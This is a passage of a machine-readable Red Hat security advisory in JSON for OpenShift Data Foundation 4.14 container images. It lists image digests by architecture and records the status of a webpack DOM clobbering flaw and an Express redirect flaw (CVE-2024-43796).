"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
